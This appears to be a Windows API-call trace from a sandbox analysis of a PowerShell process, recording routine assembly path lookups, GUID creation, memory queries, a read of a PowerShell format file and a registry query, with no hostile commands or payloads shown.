	[0394.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0394.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0394.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0395.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0395.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0395.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0395.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0395.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0395.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0395.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0395.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0395.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0395.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0395.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0395.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0395.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0395.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0395.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0395.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.559] VirtualQuery (in: lpAddress=0x16bee0, lpBuffer=0x16cda0, dwLength=0x30 | out: lpBuffer=0x16cda0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.560] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xe2e08c48, Data2=0x886a, Data3=0x473f, Data4=([0]=0x99, [1]=0x5b, [2]=0x8f, [3]=0xd1, [4]=0xa8, [5]=0xdc, [6]=0xb8, [7]=0x69))) returned 0x0
	[0395.561] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x906f6f68, Data2=0xceba, Data3=0x40f9, Data4=([0]=0xa6, [1]=0x74, [2]=0x4a, [3]=0x26, [4]=0xc7, [5]=0x76, [6]=0xaa, [7]=0xb1))) returned 0x0
	[0395.561] VirtualQuery (in: lpAddress=0x16c090, lpBuffer=0x16cf50, dwLength=0x30 | out: lpBuffer=0x16cf50*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.562] VirtualQuery (in: lpAddress=0x16c090, lpBuffer=0x16cf50, dwLength=0x30 | out: lpBuffer=0x16cf50*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.563] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x60a4fb96, Data2=0x49a2, Data3=0x45d6, Data4=([0]=0x90, [1]=0xdf, [2]=0x86, [3]=0x47, [4]=0x9f, [5]=0x72, [6]=0xe8, [7]=0x89))) returned 0x0
	[0395.565] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xfa0b512b, Data2=0xd209, Data3=0x48f1, Data4=([0]=0xa9, [1]=0xb9, [2]=0x93, [3]=0xd8, [4]=0xc5, [5]=0x55, [6]=0xaa, [7]=0xf7))) returned 0x0
	[0395.565] VirtualQuery (in: lpAddress=0x16c2e0, lpBuffer=0x16d1a0, dwLength=0x30 | out: lpBuffer=0x16d1a0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.566] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.566] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.567] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x701337e9, Data2=0x9e0e, Data3=0x479a, Data4=([0]=0x94, [1]=0x2d, [2]=0x2a, [3]=0x3b, [4]=0xb5, [5]=0x26, [6]=0xf8, [7]=0x9e))) returned 0x0
	[0395.567] VirtualQuery (in: lpAddress=0x16c2e0, lpBuffer=0x16d1a0, dwLength=0x30 | out: lpBuffer=0x16d1a0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.567] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.567] VirtualQuery (in: lpAddress=0x16b950, lpBuffer=0x16c810, dwLength=0x30 | out: lpBuffer=0x16c810*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.567] VirtualQuery (in: lpAddress=0x16b950, lpBuffer=0x16c810, dwLength=0x30 | out: lpBuffer=0x16c810*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.567] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xd1c2adfb, Data2=0xe467, Data3=0x449e, Data4=([0]=0x8f, [1]=0x6b, [2]=0x8d, [3]=0xc, [4]=0x3d, [5]=0x9e, [6]=0xe1, [7]=0x88))) returned 0x0
	[0395.568] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xd1214216, Data2=0x1403, Data3=0x411b, Data4=([0]=0xbd, [1]=0x88, [2]=0xb0, [3]=0xf0, [4]=0x0, [5]=0xba, [6]=0x5e, [7]=0x70))) returned 0x0
	[0395.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0395.568] SetErrorMode (uMode=0x1) returned 0x1
	[0395.568] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0395.568] GetFileType (hFile=0x2f8) returned 0x1
	[0395.568] SetErrorMode (uMode=0x1) returned 0x1
	[0395.568] GetFileType (hFile=0x2f8) returned 0x1
	[0395.568] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.569] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.570] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.570] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.887] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.887] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.888] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.888] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.888] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.889] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.889] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.889] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.889] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.889] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.889] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.890] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.891] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.891] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0xbce, lpOverlapped=0x0) returned 1
	[0395.891] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b644e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b644e*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0395.891] ReadFile (in: hFile=0x2f8, lpBuffer=0x34b6d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x34b6d18*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0395.891] CloseHandle (hObject=0x2f8) returned 1
	[0395.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0395.891] SetErrorMode (uMode=0x1) returned 0x1
	[0395.892] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d360 | out: lpFileInformation=0x16d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0395.892] SetErrorMode (uMode=0x1) returned 0x1
	[0395.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0395.892] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d448 | out: phkResult=0x16d448*=0x2f8) returned 0x0
	[0395.892] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3cc, lpData=0x0, lpcbData=0x16d3c8*=0x0 | out: lpType=0x16d3cc*=0x1, lpData=0x0, lpcbData=0x16d3c8*=0x56) returned 0x0
	[0395.892] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c40b0
	[0395.892] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d39c, lpData=0x1b7c40b0, lpcbData=0x16d398*=0x56 | out: lpType=0x16d39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d398*=0x56) returned 0x0
	[0395.892] CoTaskMemFree (pv=0x1b7c40b0) 
	[0395.892] RegCloseKey (hKey=0x2f8) returned 0x0
	[0395.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0395.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0395.896] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x6b23f726, Data2=0xe297, Data3=0x46d1, Data4=([0]=0xa5, [1]=0x9e, [2]=0x90, [3]=0xf4, [4]=0x87, [5]=0x2f, [6]=0x2, [7]=0x4d))) returned 0x0
	[0395.897] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x1ca56fd2, Data2=0x8dc2, Data3=0x4af5, Data4=([0]=0xb1, [1]=0xbd, [2]=0x4d, [3]=0xc, [4]=0x80, [5]=0xa8, [6]=0x60, [7]=0xe6))) returned 0x0
	[0395.897] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x781f86ec, Data2=0x8954, Data3=0x4658, Data4=([0]=0xa5, [1]=0x8f, [2]=0x68, [3]=0x67, [4]=0x85, [5]=0x4e, [6]=0xfb, [7]=0x2e))) returned 0x0
	[0395.897] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x949ec3f9, Data2=0x7250, Data3=0x4dfc, Data4=([0]=0xa7, [1]=0xb6, [2]=0x26, [3]=0xe8, [4]=0x2b, [5]=0xc9, [6]=0x66, [7]=0xac))) returned 0x0
	[0395.897] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xe668a04, Data2=0xfced, Data3=0x4022, Data4=([0]=0xa3, [1]=0xc2, [2]=0xf5, [3]=0xa8, [4]=0x33, [5]=0x62, [6]=0x42, [7]=0xc9))) returned 0x0
	[0395.897] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x237bf4a7, Data2=0x9388, Data3=0x4e79, Data4=([0]=0x9e, [1]=0x4c, [2]=0xaa, [3]=0x2a, [4]=0xfe, [5]=0x8b, [6]=0x13, [7]=0x4))) returned 0x0
	[0395.897] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.897] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x6653d5ec, Data2=0x938f, Data3=0x4b47, Data4=([0]=0xa1, [1]=0x48, [2]=0xe8, [3]=0xe3, [4]=0x9, [5]=0xf9, [6]=0x66, [7]=0xe9))) returned 0x0
	[0395.898] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
